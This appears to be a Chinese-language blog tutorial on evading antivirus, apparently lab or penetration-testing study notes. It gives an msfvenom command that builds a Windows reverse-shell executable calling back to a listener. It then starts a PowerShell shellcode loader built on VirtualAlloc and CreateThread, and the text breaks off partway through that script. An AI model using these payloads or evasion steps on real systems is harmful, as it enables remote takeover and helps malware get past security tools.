發表文章

目前顯示的是有「exe」標籤的文章

防毒軟體規避

圖片
 防毒軟體規避 列出一個檔案的 SHA 256 HASH 指令 └─$ sha256sum post.txt    列出一個檔案的二進制與 ASCII 格式使用 xxd 指令 └─$ xxd -b post.txt                           透過 msfvenom 包一個 reverse shell 的 exe payload,檔名為 binary.exe └─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.228 LPORT=4444 -f exe > binary.exe 將檔案 COPY 到裝有 Defender 的 Windows 系統會馬上跳出如下的告警 判定為 Trojan 木馬後門程式並直接隔離無法使用 上傳到 VirusTotal 也是偵測出為木馬後門程式 接著來手動作一個 PowerShell PS 腳本如下 =================================================================== $code = ' [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); [DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr dest, uint sr...